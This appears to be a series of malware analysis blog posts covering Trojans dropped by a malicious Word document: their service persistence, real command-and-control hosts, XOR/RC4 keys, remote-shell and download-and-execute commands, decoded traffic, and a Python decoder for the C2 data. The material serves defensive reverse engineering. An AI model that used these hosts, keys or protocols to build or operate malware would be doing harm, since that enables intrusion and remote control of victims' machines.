00405585     PUSH update.00408BC0          ASCII "%s    "
00405591     PUSH update.00408BC0          ASCII "%s    "
004055A0     PUSH update.00408498          ASCII ""
004055A5     PUSH update.00408324          ASCII ""
004055C2     PUSH update.00408CDC          ASCII "messagename:%s"
004055D6     PUSH update.0040818C          ASCII "%s"
00405665     PUSH update.00408EF0          ASCII "select filename,filetotallength,filepiecelength,filepieceindex
0040567F     PUSH update.00408EB8          ASCII "select distinct filename,filetotallength from tab_file"
004056D9     PUSH update.00408498          ASCII ""
004056DE     PUSH update.00408E98          ASCII ""
004056FB     PUSH update.00408E88          ASCII "filename:%s    "
00405707     PUSH update.00408498          ASCII ""
0040570C     PUSH update.00408E60          ASCII ""
00405729     PUSH update.00408E50          ASCII "filelength:%s    "
00405735     PUSH update.00408498          ASCII ""
0040573A     PUSH update.00408E28          ASCII ""
00405757     PUSH update.00408E14          ASCII "filepiecelength:%s    "
00405763     PUSH update.00408498          ASCII ""
00405768     PUSH update.00408DEC          ASCII ""
00405781     PUSH update.00408DDC          ASCII "filepiece:%s"
0040579F     PUSH update.00408498          ASCII ""
004057A4     PUSH update.00408E98          ASCII ""
004057BD     PUSH update.00408E88          ASCII "filename:%s    "
004057C9     PUSH update.00408498          ASCII ""
004057CE     PUSH update.00408E60          ASCII ""
004057E7     PUSH update.00408DCC          ASCII "filelength:%s"
00405832     PUSH update.004090B4          ASCII "Alert!Pls press enter to make sure!"
0040584F     PUSH update.00408220          ASCII "%[^]"
0040585D     MOV ESI, update.004090AC      ASCII "enter"
004058CB     PUSH update.004090A8          ASCII "$"
004058F8     PUSH update.00408220          ASCII "%[^]"
0040597C     MOV ESI, update.004090A4      ASCII "cls"
004059B0     PUSH update.004090A4          ASCII "cls"
004059C3     MOV ESI, update.00409098      ASCII "listclients"
004059FB     MOV ESI, update.00409094      ASCII "lcs"
00405A33     MOV ESI, update.00409084      ASCII "listmessages"
00405A6B     MOV ESI, update.00409080      ASCII "lms"
00405AA3     MOV ESI, update.00409074      ASCII "listfiles"
00405ADB     MOV ESI, update.00409070      ASCII "lfs"
00405B13     MOV ESI, update.00409064      ASCII "delclient"
00405B4B     MOV ESI, update.0040905C      ASCII "delc"
00405B83     MOV ESI, update.00409050      ASCII "delmessage"
00405BBB     MOV ESI, update.00409048      ASCII "delm"
00405BF3     MOV ESI, update.00409040      ASCII "delfile"
00405C2B     MOV ESI, update.00409038      ASCII "delf"
00405C63     MOV ESI, update.0040902C      ASCII "debugfile"
00405C9B     MOV ESI, update.00409024      ASCII "dbgf"
00405CD3     MOV ESI, update.00409018      ASCII "debugclient"
00405D0B     MOV ESI, update.00409010      ASCII "dbgc"
00405D43     MOV ESI, update.00409000      ASCII "debugmessage"
00405D7B     MOV ESI, update.00408FF8      ASCII "dbgm"
00405DB3     MOV ESI, update.00408FF0      ASCII "connect"
00405DEB     MOV ESI, update.00408FEC      ASCII "con"
00405E23     MOV ESI, update.00408FE4      ASCII "quitz"
00405E5B     MOV ESI, update.00408FDC      ASCII "quit"
00405E93     MOV ESI, update.00408FD4      ASCII "upfile"
00405ECB     MOV ESI, update.00408FD0      ASCII "uf"
00405F03     MOV ESI, update.00408FC4      ASCII "downfile"
00405F3B     MOV ESI, update.00408FC0      ASCII "df"
00405F84     PUSH update.00408FA4          ASCII "Pls choose target first! "
00405F97     MOV ESI, update.004082A8      ASCII "sleep"
00405FFE     PUSH update.004082A8          ASCII "sleep"
00406010     MOV ESI, update.00408F9C      ASCII "getfile"
00406048     MOV ESI, update.00408F98      ASCII "gf"
00406080     MOV ESI, update.00408F90      ASCII "putfile"
004060B8     MOV ESI, update.00408F8C      ASCII "pf"
004060F0     MOV ESI, update.00408F80      ASCII "uninstall"
00406128     MOV ESI, update.004082B0      ASCII "remove"
00406160     MOV ESI, update.00408304      ASCII "shell"
0040619E     PUSH update.00408304          ASCII "shell"
004061A3     PUSH update.00408F7C          ASCII "cd"
004061AD     PUSH update.00408304          ASCII "shell"
004061B4     MOV ESI, update.004082F8      ASCII "reshell"
004061F2     PUSH update.004082F8          ASCII "reshell"
004061F7     PUSH update.00408F7C          ASCII "cd"
00406201     PUSH update.004082F8          ASCII "reshell"
0040621D     MOV ESI, update.004082F0      ASCII "listp"
0040625B     PUSH update.004082F0          ASCII "listp"
00406260     PUSH update.00408F7C          ASCII "cd"
0040626A     PUSH update.004082F0          ASCII "listp"
0040627C     MOV ESI, update.004082D8      ASCII "printf"
004062D3     PUSH update.004082D8          ASCII "printf"
004062E7     PUSH update.004082D8          ASCII "printf"
004062F9     MOV ESI, update.004082D0      ASCII "runfile"
00406350     PUSH update.004082D0          ASCII "runfile"
00406364     PUSH update.004082D0          ASCII "runfile"
00406376     MOV ESI, update.004082E0      ASCII "killp"
004063C9     PUSH update.004082E0          ASCII "killp"
004063DD     PUSH update.004082E0          ASCII "killp"
004063EF     PUSH update.00408F6C          ASCII "Command Error! "
0040640A     MOV ESI, update.00408F64      ASCII "exit"
00406461     PUSH update.00408304          ASCII "shell"
0040646B     PUSH update.00408304          ASCII "shell"
00406487     PUSH update.004082B0          ASCII "remove"
0040648C     PUSH update.004082B0          ASCII "remove"
00406496     PUSH update.004082B0          ASCII "remove"
004064E0     PUSH update.004082B8          ASCII "filestoc"
00406532     PUSH update.004082C4          ASCII "filectos"
004067E6     MOV ESI, update.00408304      ASCII "shell"
00406824     PUSH update.00408720          ASCII "%s"
00406843     PUSH update.004090D8          ASCII "(info)%s->%s:%s $"
0040693D up  PUSH EBP                      (Initial CPU selection)
00406A60     PUSH 30000                    ASCII "Actx "
00406A65     PUSH 10000                    UNICODE "ALLUSERSPROFILE=C:\Documents and Settings\All Users"

Login.exe analysis (Trojan.PipCreat)

  • Today I will take a look at a Trojan that was dropped from a malicious Word document with the following characteristics:
File Name:  SKY Perfect JSAT Launches ExBird Satellite IP Network Service.doc
File Size:  160822 bytes
MD5:        ab35199de232bfbb99a676cf881e9a85
SHA1:       b9953ca586709bf6ddb98fe0c2d164f9f48f02e9
  • There is nothing too interesting about the document itself; it carries an old exploit (CVE-2010-3333).
  • The only thing worth mentioning is an 8-byte pattern that serves as a marker the shellcode uses to locate the data it needs within the carrier file.
  • This pattern is located at file offset 0x1A200 of the carrier file:
Offset      0  1  2  3  4  5  6  7   8  9  A  B  C  D  E  F

0001A200   50 64 50 44 EF FE EA AE                            PdPDïþê®
  • The Trojan that is dropped on the system when the carrier file is opened has the following characteristics:
File Name:  LOGIN.EXE
File Path:  C:\Documents and Settings\username\Local Settings\Temp
File Size:  16896 bytes
MD5:        f09d832bea93cf320986b53fce4b8397
SHA1:       df0d7583a0909c61535df01dc5188547649bc6e4
PE Time:    0x4DBFA42D [Tue May 03 06:43:57 2011 UTC]
AV:         10/42 (23.8%) [VirusTotal]
Sections (3):
 Name      Entropy  MD5
 .text     5.56     caa26fd73931d1e8cbde27775befaa13
 .rdata    4.03     0fddf4e4048532895c129f78efdc32b3
 .data     5.04     734de5f9857d81bc4776770e3e2c1e81
  • When this Trojan is executed the following relevant behavior was observed:
    • Attempts to create file: “C:\windows\system32 \browseui.dll” (notice the extra space after system32).  This attempt fails because the path is incorrect.
    • Attempts to create file: “C:\windows\system32\dmdskngr.dll“.  This attempt is successful.
    • The Trojan then writes the data starting at file offset 0xE00 of login.exe into the newly created file.  This data is not obfuscated in any way.
    • The Trojan then attempts to check the status of file: “C:\windows\system32\dmdskngr.dll\ipxmontr.dll“.  This file also does not exist.  This is another programming mistake as the author probably intended to check “C:\windows\system32\ipxmontr.dll” so that it could retrieve this file’s timestamps and apply them to dmdskngr.dll.  However, because of the mistake the timestamps of dmdskngr.dll are not backdated.
    • Next, login.exe takes care of the entrenchment of the DLL as a service.  The service information is shown below:
      • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4
      • Description (notice the misspelled words): Service that offers Security network whith Outlook Express. It shuodn’t be stopped unless Special service needed or you known how to contrl.
      • DisplayName: Network Provider Service
      • ServiceDLL: C:\windows\system32\dmdskngr.dll
    • The newly created service is then started.

ANALYSIS OF dmdskngr.dll (Trojan.PipCreat)

  • File dmdskngr.dll has the following characteristics:
File Name:  dmdskngr.dll
File Size:  12288 bytes
MD5:        d6de06add6aba572aed7309c9368c859
SHA1:       628bf3079e348cbe356a67c7aceb96ce4723df2d
PE Time:    0x4DBFA411 [Tue May 03 06:43:29 2011 UTC]
AV:         3/42 (7.1%) [VirusTotal]
Sections (5):
 Name      Entropy  MD5
 .text     5.83     2c248cb35fe323f911408e42cce61083
 .rdata    4.48     c1274124487594363fad0a809036ec3a
 .data     3.18     b3f9e4e01b6e11bd7da327d8952b7a17
 .rsrc     2.62     b79434a52eae91f7d67cb1dd6a7c5f49
 .reloc    4.33     15ca6d08c81195524e30e1bf0c0c7b20
  • This Trojan beacons to: jennifer98.lookin.at and 196.44.49.154 over TCP port 8500.
  • All network traffic is obfuscated with a single-byte XOR using the key 0x3F (the dumps below are shown with the XOR removed).
  • The C2 node transmits first, sending the following string:
00000000   61 72 65 20 79 6F 75 20  74 68 65 72 65 21 40 23   are you there!@#
00000010   24 25 5E 26 2A 28 29 5F  2B 00                       $%^&*()_+.
  • The Trojan replies with:
00000000   30 30 6B 00                                        00k
  • Followed by system information as UTF-16LE strings, led by the hardcoded string 0526w; in this capture the fields read victim, 192.168.1.100, WinXp SP3 and 2011-06-02 13:54:
00000000   30 00 35 00 32 00 36 00  77 00 00 00 00 00 00 00   0 5 2 6 w      
00000010   00 00 00 00 76 00 69 00  63 00 74 00 69 00 6D 00       v i c t i m
00000020   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
00000030   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
00000040   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
00000050   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
00000060   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
00000070   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
00000080   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
00000090   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
000000A0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
000000B0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
000000C0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
000000D0   00 00 00 00 00 00 00 00  00 00 00 00 31 00 39 00               1 9
000000E0   32 00 2E 00 31 00 36 00  38 00 2E 00 31 00 2E 00   2 . 1 6 8 . 1 .
000000F0   31 00 30 00 30 00 00 00  00 00 00 00 00 00 00 00   1 0 0          
00000100   00 00 00 00 57 00 69 00  6E 00 58 00 70 00 20 00       W i n X p  
00000110   53 00 50 00 33 00 00 00  00 00 00 00 00 00 00 00   S P 3          
00000120   00 00 00 00 00 00 00 00  00 00 00 00 32 00 30 00               2 0
00000130   31 00 31 00 2D 00 30 00  36 00 2D 00 30 00 32 00   1 1 - 0 6 - 0 2
00000140   20 00 31 00 33 00 3A 00  35 00 34 00 00 00 00 00     1 3 : 5 4    
00000150   00 00 00 00 E4 04 00 00                                ä
  • The Trojan is controlled through a number of integer commands that occupy the first DWORD of each block of data received from the C2 node.
  • The commands from the C2 node are expected to arrive in a 4098-byte block of data.
  • The commands are listed below (bytes as they appear on the wire, i.e. little-endian DWORDs 2 through 8):
02000000 -> Process List
03000000 -> Kill a process
04000000 -> Download a file (from C2 to victim)
05000000 -> Uninstall (cleanup is done)
06000000 -> Remote shell
07000000 -> No operation (see the jump table below)
08000000 -> Execute a file
  • Here is the jump table where the commands are processed:
10001445    48                    DEC EAX
10001446    48                    DEC EAX
10001447    0F84 B8000000         JE dmdskngr.10001505                              ; 02 -> PROCESS LIST
1000144D    48                    DEC EAX
1000144E    0F84 8B000000         JE dmdskngr.100014DF                              ; 03 -> PROCESS KILL
10001454    48                    DEC EAX
10001455 >  74 6B                 JE SHORT dmdskngr.100014C2                        ; 04 -> UPLOAD FILE
10001457    48                    DEC EAX
10001458    74 4B                 JE SHORT dmdskngr.100014A5                        ; 05 -> UNINSTALL TROJAN
1000145A    48                    DEC EAX
1000145B    74 2B                 JE SHORT dmdskngr.10001488                        ; 06 -> REMOTE SHELL
1000145D    48                    DEC EAX
1000145E  ^ 0F84 70FFFFFF         JE dmdskngr.100013D4                              ; 07 -> DO NOTHING
10001464    48                    DEC EAX
10001465    0F85 B7000000         JNZ dmdskngr.10001522                            
1000146B    8BC3                  MOV EAX, EBX
1000146D    8DB5 FCEFFFFF         LEA ESI, DWORD PTR SS:[EBP-1004]
10001473    E8 880E0000           CALL dmdskngr.10002300
10001478    B9 00040000           MOV ECX, 400
1000147D    8BFC                  MOV EDI, ESP
1000147F    F3:A5                 REP MOVS DWORD PTR ES:[EDI], DWORD PTR DS:[ESI]
10001481    E8 79090000           CALL dmdskngr.10001DFF                            ; 08 -> EXECUTE FILE
10001486    EB 72                 JMP SHORT dmdskngr.100014FA

  • Here is a dump of some of the strings found in this DLL:
Text strings referenced in dmdskngr:.text
Address        Disassembly                     Text string
1000100F       MOV ESI, dmdskngr.100043C0      UNICODE "6to4"
10001182       MOV ESI, dmdskngr.1000409C      ASCII "recv"
1000127E       PUSH dmdskngr.100040AC          UNICODE "ws2_32.dll"
10001349       PUSH dmdskngr.10004028          ASCII "jennifer98.lookin.at"
1000135B       PUSH dmdskngr.1000405C          ASCII "196.44.49.154"
10001373       MOV ESI, dmdskngr.100045C8      UNICODE "0526w"
10001446       DEC EAX                         (Initial CPU selection)
10001528       MOV EDI, dmdskngr.100040C4      ASCII "exit
"
10001622       PUSH dmdskngr.100040D0          ASCII "are you there!@#$%^&*()_+"
10001677       PUSH dmdskngr.100040CC          ASCII "00k"
100016D8       PUSH dmdskngr.10004014          UNICODE "0526w"
100016DD       PUSH dmdskngr.100045C8          UNICODE "0526w"
100017A1       PUSH dmdskngr.100046A4          UNICODE "192.168.1.100"
100017DD       PUSH dmdskngr.100045DC          UNICODE "victim"
10001886       PUSH dmdskngr.10004194          UNICODE "Not find"
10001899       PUSH dmdskngr.10004188          UNICODE "WinNT"
100018C0       PUSH dmdskngr.10004178          UNICODE "Win2000"
100018E2       PUSH dmdskngr.1000416C          UNICODE "WinXp"
10001904       PUSH dmdskngr.1000415C          UNICODE "Win2003"
1000191D       PUSH dmdskngr.10004140          UNICODE "Vista|08|Win7"
1000192D       PUSH dmdskngr.10004138          UNICODE " SP"
10001950       PUSH dmdskngr.1000412C          UNICODE "%s%d"
10001984       PUSH dmdskngr.1000411C          UNICODE "Win Me"
1000198B       PUSH dmdskngr.1000410C          UNICODE "Win 98"
10001992       PUSH dmdskngr.100040FC          UNICODE "Win 95"
10001999       PUSH dmdskngr.100040EC          UNICODE "Win 32"
100019B6       PUSH dmdskngr.100046CC          UNICODE "WinXp SP3"
100019D1       PUSH dmdskngr.100041E8          ASCII "NtQuerySystemInformation"
100019D6       PUSH dmdskngr.100041DC          UNICODE "ntdll"
10001A42       PUSH dmdskngr.100041A8          UNICODE "%04d-%02d-%02d %02d:%02d"
10001A47       PUSH dmdskngr.100046F4          UNICODE "2011-06-02 17:50"
10001AA5       PUSH 10010                      UNICODE "PROFILE=C:\Documents and Settings\All Users"
10001AAA       PUSH dmdskngr.100043C0          UNICODE "6to4"
10001AFD       PUSH dmdskngr.10004224          UNICODE "\dmdskngr.dll"
10001B18       PUSH dmdskngr.10004204          UNICODE "\dmdsknngr.dll"
10001C83       PUSH dmdskngr.10004268          UNICODE "success kill process ok"
10001C8C       PUSH dmdskngr.10004240          UNICODE "failed kill process"
10001DBF       PUSH dmdskngr.100042B8          UNICODE "file recv ok"
10001DD3       PUSH dmdskngr.10004298          UNICODE "file recv error"
10001E09       PUSH dmdskngr.1000430C          UNICODE "open"
10001E1C       PUSH dmdskngr.100042F4          UNICODE "file run ok"
10001E25       PUSH dmdskngr.100042D4          UNICODE "file run failed"
10001EA6       PUSH dmdskngr.10004324          UNICODE "kernel32.dll"
10001EB1       MOV ESI, dmdskngr.10004318      ASCII "CraatePipe"
10001FC0       PUSH dmdskngr.10004390          UNICODE "cmd.exe"
10002019       PUSH dmdskngr.1000436C          UNICODE "cmd create failed"
10002165       PUSH dmdskngr.10004364          ASCII "exit"
100021BB       PUSH dmdskngr.10004340          UNICODE "pip creat failed"
10002226       PUSH dmdskngr.100043A0          UNICODE "are you there? "
Analysis of file winsrv.exe – Version2

  • Today I will look at another version of the Trojan I analyzed yesterday.
  • The file I will be looking at today has the following characteristics:
File Name:  winsrv.exe
File Size:  16384 bytes
MD5:        438983192903f3fecf77500a39459ee6
SHA1:       12f12f03151c58b28a7d7246c7006888af2419e4
PE Time:    0x4AFA5A9E [Wed Nov 11 06:33:02 2009 UTC]
Sections (4):
 Name      Entropy  MD5
 .text     6.46     7ff188f9b5aea61d1c76148357bd7e3e
 .rdata    5.01     051ecda73070d6be8f96ba79e6a788af
 .data     3.64     272a56ff1f5b0eb66946c5c5287271ce
 .rsrc     1.54     19c9e330b0e6565f982fb1234d8a0b74
  • This file was submitted to VirusTotal in March 2011, and it had an 11.6% identification rate.  See report here. Now, it has a 58.1% identification rate.  See report here.
  • Just like in the previous analysis, this file decrypts its configuration data using RC4 with the following key:
00000000   31 32 33 21 40 23 71 77  65 51 57 45 00            123!@#qweQWE
  • The Trojan entrenches itself using the same service as before (DevFS).
  • The beacon URL is also the same as the previous sample: http://www.cometoway.org/comp/sem/resources.htm
  • Just like the previous sample, this Trojan parses the HTML file for the comment tag, and Base64 decodes the instruction found there.
  • Unlike the previous sample, when the Trojan is instructed to download and execute a file, it does not expect the file to be Base64 encoded.
    • This version of the Trojan does not expect the transferred file to be obfuscated in any way.
  • Unlike the previous sample, this Trojan provides reverse shell functionality.  So, this Trojan supports these three types of instructions:
S: or s:     Sleep instruction.
D: or d:     Download and execute instruction.
IP:port      Reverse shell instruction.
  • So, when the Trojan does not receive an “s” or “d” in the first byte of the decoded data, it searches for “:” and expects to receive an IP address and a port number.
  • When the Trojan receives an IP:port instruction, it does the following:
    • It connects to the specified IP address over the specified TCP port number.
    • It copies cmd.exe into C:\WINDOWS\TEMP\iniet.exe, and executes iniet.exe.
    • It calculates the MD5 hash of the string 12345, which is 827CCB0EEA8A706C4C34A16891F84E7B.
    • It uses the first 8 bytes of that hash, in their 16-character ASCII hex form, as an RC4 key to encrypt the communication over this connection.
    • So, the Trojan uses the 128-bit RC4 key shown below:
00000000   38 32 37 43 43 42 30 45  45 41 38 41 37 30 36 43   827CCB0EEA8A706C
  • Finally, the Trojan Base64 encodes the RC4 encrypted data using a slightly modified alphabet:
STANDARD BASE64 ALPHABET:
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
TROJAN ALPHABET:
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-/
  • So, what you may see on the wire is the following:
Base64 encoded data:
00000000  59 33 76 61 52 37 2d 56  30 56 6a 36 67 64 6e 69 Y3vaR7-V 0Vj6gdni
00000010  33 59 75 51 61 70 4d 6d  38 34 7a 69 4a 65 56 6e 3YuQapMm 84ziJeVn
00000020  71 36 4a 59 68 34 34 74  44 6e 45 73 56 45 69 5a q6JYh44t DnEsVEiZ
00000030  45 67 4f 61 51 77 70 6e  31 52 41 52 51 44 75 6a EgOaQwpn 1RARQDuj
00000040  6b 35 48 72 39 53 55 75  46 77 50 34 6f 49 76 76 k5Hr9SUu FwP4oIvv
00000050  32 6d 70 37 48 45 46 31  56 54 58 52 65 6d 57 42 2mp7HEF1 VTXRemWB
00000060  35 4d 6b 45 38 6d 78 63  78 52 6d 56 64 34 54 6d 5MkE8mxc xRmVd4Tm
00000070  64 57 34 52 77 64 66 57  76 65 4a 6f 4c 6d 75 59 dW4RwdfW veJoLmuY
00000080  66 38 33 78 66 44 70 43  2f 6a 55 3d             f83xfDpC /jU=
0000008C  00                                               .

Using the custom alphabet the data above DECODES TO:

00000000   63 7B DA 47 BF 95 D1 58  FA 81 D9 E2 DD 8B 90 6A   c{ÚG¿•ÑXúÙâÝ‹
00000010   93 26 F3 8C E2 25 E5 67  AB A2 58 87 8E 2D 0E 71   “&óŒâ%åg«¢X‡Ž- q
00000020   2C 54 48 99 12 03 9A 43  0A 67 D5 10 11 40 3B A3   ,TH™  šC gÕ  @;£
00000030   93 91 EB F5 25 2E 17 03  F8 A0 8B EF DA 6A 7B 1C   “‘ëõ%.  ø ‹ïÚj{
00000040   41 75 55 35 D1 7A 65 81  E4 C9 04 F2 6C 5C C5 19   AuU5ÑzeäÉ òl\Å
00000050   95 77 84 E6 75 6E 11 C1  D7 D6 BD E2 68 2E 6B 98   •w„æun Á×Ö½âh.k˜
00000060   7F CD F1 7C 3A 42 FE 35                            Íñ|:Bþ5

Using the 128-bit RC4 key the data above DECRYPTS TO:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Analysis of file winsrv.exe

  • Today I will take a look at a simple Trojan.  The file has the following characteristics:
File Name:  winsrv.exe
File Size:  9216 bytes
MD5:        a2534e9b7e4146368ea3245381830eb0
SHA1:       daf456cefefe7492f4d0b67c662d6a631ecdb019
PE Time:    0x4C293EED [Tue Jun 29 00:31:41 2010 UTC]
Sections (4):
 Name      Entropy  MD5
 .text     6.03     7187e149cf1100b3feb4422f1bcf46b0
 .rdata    5.06     8cc17c11b3310389c68b7ae9fccd0701
 .data     4.8      c92c29f936e1abe0738f48a8cb656e69
 .rsrc     1.54     64dbfa32c9d59e19bcd7fcbf913a270c
  • This file had already been submitted to VirusTotal in March 2011.  At that time this Trojan had an 11.6% identification rate.  See report here.
  • When I resubmitted the file for analysis today, I got a 0% identification rate.  See report here. This is pretty funny.
  • When this Trojan is executed it starts by entrenching itself in the registry as a service named DevFS (Device File System).  The service path and description are shown below:
    • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DevFS
    • Saves installation files used for updates and repairs and is required for the downloading of Setup updates and Watson error reports.
  • The Trojan then starts the DevFS service.  So, process winsrv.exe will have services.exe as its parent process.
  • At this point the Trojan begins by decrypting its configuration data using RC4 (0x004011B0).
  • The data in question is shown below (the byte 0x2F at offset 0x2283 is the length of the configuration data that follows it):
Offset      0  1  2  3  4  5  6  7   8  9  A  B  C  D  E  F

00002260   00 00 0F 00 48 00 65 00  6C 00 6C 00 6F 00 20 00       H e l l o  
00002270   66 00 72 00 6F 00 6D 00  20 00 4D 00 46 00 43 00   f r o m   M F C
00002280   21 00 00 2F FE 2C 19 6B  32 40 C9 3E ED FC D1 99   !  /þ, k2@É>íüÑ™
00002290   FD B1 31 C9 6B B3 59 8C  C7 47 09 9D 56 BD 3F 18   ý±1Ék³YŒÇG V½?
000022A0   33 83 E4 71 9C C8 29 2A  70 87 15 10 50 45 23 8B   3ƒäqœÈ)*p‡  PE#‹
000022B0   B0 C0 E6 00 00 00 00 00  00 00 00 00 00 00 00 00   °Àæ            
000022C0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
  • The RC4 key used to decrypt this data can be found at file-offset 0x2020:
Offset      0  1  2  3  4  5  6  7   8  9  A  B  C  D  E  F

00002010   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
00002020   31 32 33 21 40 23 71 77  65 51 57 45 00 00 00 00   123!@#qweQWE   
00002030   48 54 54 50 20 4D 6F 7A  69 6C 6C 61 2F 35 2E 30   HTTP Mozilla/5.0
00002040   28 63 6F 6D 70 61 74 69  62 6C 65 2B 4D 53 49 45   (compatible+MSIE
  • So, the RC4 key is 0x31323321402371776551574500 (yes, the NULL is part of the key).
  • The encrypted data decrypts to the following URL:
http://www.cometoway.org/comp/sem/resources.htm
  • The Trojan sends the following GET request:
GET /comp/sem/resources.htm HTTP/1.1
User-Agent: HTTP Mozilla/5.0(compatible+MSIE)
Host: www.cometoway.org
Cache-Control: no-cache
  • The Trojan parses (0x004016D0) the received data for the HTML comment tags:
<!-- [Base64 encoded data] -->
  • So, the data contained within the comment tags must be Base64 (0x00401060) encoded using almost the whole standard alphabet.  There is a one-character difference between the standard alphabet and the one this Trojan uses:
STANDARD BASE64 ALPHABET:
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
TROJAN ALPHABET:
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-/
  • The first letter of the decoded data must be: s or d (lower or upper case).
  • These two letters represent the instructions that this Trojan understands.
s or S - Instructs the Trojan to sleep for a specified time in hours.
d or D - Instructs the Trojan to download and execute a file.
  • At the time of this writing file resources.htm contains the following comment:
<!-- czo2 --> decodes to s:6
which instructs the Trojan to sleep for 6 hours
  • The download command has the following format:
"d:http://www.more-evil.com/trojan2.jpg trojan2.exe "
  • The file requested in the URL is expected to be Base64 encoded using the custom alphabet shown above.
  • The encoded file is downloaded and temporarily stored in a file named NET#.exe.
  • Once the file is decoded, it is saved under the filename specified in the instruction (in this example: trojan2.exe) and is executed.
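A decoder for the two posts above (the reverse-shell traffic of the Version 2 sample and the HTML-comment instructions both versions fetch), added here as an example and not taken from the Trojan or the author's tooling. The wire sample, the RC4 key and the `<!-- czo2 -->` comment are the values quoted in the posts; the surrounding HTML is constructed.

```python
"""Decode winsrv.exe C2 data: custom Base64 alphabet, HTML-comment instructions,
and the RC4 layer that version 2 puts on its reverse-shell traffic."""
import re
from typing import Tuple

STANDARD_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
TROJAN_ALPHABET = STANDARD_ALPHABET[:-2] + "-/"   # only '+' is replaced by '-'


def b64decode_custom(text: str, alphabet: str = TROJAN_ALPHABET) -> bytes:
    """Base64-decode with an arbitrary 64-character alphabet (trailing '=' allowed).

    Written out bit by bit rather than translating to the standard alphabet, so a
    character outside the Trojan's alphabet (e.g. '+') is rejected, not remapped."""
    table = {ch: i for i, ch in enumerate(alphabet)}
    bits = nbits = 0
    out = bytearray()
    for ch in text.strip().rstrip("="):
        if ch not in table:
            raise ValueError(f"character {ch!r} not in alphabet")
        bits = (bits << 6) | table[ch]
        nbits += 6
        if nbits >= 8:
            nbits -= 8
            out.append((bits >> nbits) & 0xFF)
            bits &= (1 << nbits) - 1
    return bytes(out)


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


COMMENT_RE = re.compile(r"<!--\s*(.*?)\s*-->", re.S)


def parse_instruction(html: str) -> Tuple[str, str]:
    """Pull the Base64 instruction out of the first HTML comment and classify it
    the way the posts describe: s/S sleep, d/D download, otherwise IP:port."""
    m = COMMENT_RE.search(html)
    if m is None:
        raise ValueError("no HTML comment found")
    decoded = b64decode_custom(m.group(1)).decode("latin-1")
    first = decoded[:1].lower()
    if first == "s":
        kind = "sleep"
    elif first == "d":
        kind = "download"
    elif ":" in decoded:
        kind = "reverse-shell"      # Version 2 only: "IP:port"
    else:
        raise ValueError(f"unknown instruction {decoded!r}")
    return kind, decoded


# Constructed page wrapping the comment the post found in resources.htm.
SAMPLE_HTML = "<html><body><p>resources</p><!-- czo2 --></body></html>"

# Reverse-shell traffic quoted in the Version 2 post; key = ASCII hex of the
# first 8 bytes of MD5("12345").
SHELL_KEY = b"827CCB0EEA8A706C"
WIRE_SAMPLE = ("Y3vaR7-V0Vj6gdni3YuQapMm84ziJeVnq6JYh44tDnEsVEiZEgOaQwpn1RARQDuj"
               "k5Hr9SUuFwP4oIvv2mp7HEF1VTXRemWB5MkE8mxcxRmVd4TmdW4RwdfWveJoLmuY"
               "f83xfDpC/jU=")


def decode_shell_traffic(encoded: str, key: bytes = SHELL_KEY) -> bytes:
    """Undo the two layers in the order the Trojan applies them (RC4, then Base64)."""
    return rc4(key, b64decode_custom(encoded))


if __name__ == "__main__":
    print(parse_instruction(SAMPLE_HTML))
    print(decode_shell_traffic(WIRE_SAMPLE).decode("latin-1", errors="replace"))
```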

Update on www.cometoway.org

  • After poking around this website I found the following directory structure, which includes additional HTML files with instructions for this type of Trojan.
www.cometoway.org => 67.20.115.170
└───comp
 │
 ├───ason
 │       searc.htm             Modified: 12/22/2010
 │
 ├───green
 │       construct.htm         Modified: 6/10/2010
 │       resources.htm         Modified: 3/25/2011
 │
 ├───ihhe
 │       index.html            No encoded instruction
 │       woodview.gif          Normal GIF.
 │
 ├───lib
 │       searc.htm             Modified: 8/31/2010
 │
 ├───moto
 │       resources.htm         Modified: 3/25/2011
 │
 ├───saw
 │       construct.htm         Modified: 6/10/2010
 │       resources.htm         Modified: 4/26/2011
 │
 ├───sea
 │       searc.htm             Modified: 4/20/2011
 │
 ├───sem
 │       resources.htm         Modified: 3/26/2011
 │
 ├───sii
 │       searc.htm             Modified: 12/3/2010
 │       searc.html            Modified: 10/5/2010
 │
 ├───spar
 │       company.htm          Modified: 6/10/2010
 │
 └───water
         57.gif               Normal GIF
         index.html           No encoded instruction
         water.htm            Modified: 3/15/2011
  • All the relevant HTML files contain sleep instructions at this time, and they all contain Base64 encoded instructions using the standard alphabet, except file /moto/resources.htm.
  • This file appears to contain an instruction encoded with a custom Base64 alphabet, but judging by the length of the instruction, it is probably a sleep instruction.  Here it is:
<!-- Q)k(J<== -->

The PNG Trojan – AcroRD32.exe

